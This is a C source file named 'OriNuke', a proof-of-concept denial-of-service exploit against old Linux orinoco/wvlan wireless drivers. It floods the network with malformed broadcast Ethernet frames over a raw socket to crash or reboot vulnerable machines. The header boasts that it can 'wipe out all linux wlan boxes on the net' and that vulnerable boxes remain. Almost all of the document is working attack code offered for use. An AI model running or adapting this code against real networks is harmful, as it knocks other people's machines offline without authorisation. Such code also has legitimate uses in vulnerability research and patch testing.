/*******************************************************
 *
 * OriNuke - Orinoco Wavelan Nuker
 * ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 *
 * The old orinoco/wvlan driver ( < orinoco_cs 0.11)
 * didn't check for under- oder oversized ethernet
 * frames -> after receiving such a frame, the whole
 * box crashed/rebooted...
 *
 * Since the bug finally has been fixed, here is a 
 * simple proof of concept exploit... there should
 * still be enough vulnerable boxes out there...
 *
 * By sending a few of these broken ethernet frames
 * you can wipe out all linux wlan boxes on the net.
 *
 * Keep in mind, that you need a wired box to send
 * the nukes unless your wireless box can really spoof 
 * on ethernet level.
 *
 * Greetings fly to: 
 * 	DigiDust, Anarchy, Hunz, bullet, huega, Mike, 
 * 	Macrotron, koerk ...
 *
 * 
 * Have phun,
 *  gh0st
 * 
 ******************************************************/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <errno.h>
#include <sys/socket.h>              
#include <netinet/in.h>            
#include <net/ethernet.h>              

int main(int argc, char **argv) {
	int sock, ret, i, numnukes;
	char *packet, device[1024];
	struct sockaddr	sa;

	packet=malloc(64);
	memset(packet,0,64);
	memset(packet,0xff,6);

	printf("[[ OriNuke - WaveLAN Nuker ]]\n - written by gh0st\n\n");
	
	if(argc<3) {
		printf(" Usage: %s <interface> <numnukes>\n\n", argv[0]);
		return -1;
	}

	strncpy(device,argv[1],1024);
	numnukes=atoi(argv[2]);
    	
	if((sock=socket(PF_INET, SOCK_PACKET, htons(ETH_P_ALL)))<0){
		perror("Error creating socket");
		return -1;
	}
	
	memset(&sa,0,sizeof(sa));
	strncpy(sa.sa_data,device,sizeof(sa.sa_data));

	printf("Sending nukes: ");
	for(i=0;i<numnukes;i++) {
		ret=sendto(sock,packet,64,0,&sa,sizeof(sa));
		printf(".");
	}
	printf("\n\nPeace!\n");

	free(packet);
	close(sock);
	return 0;
}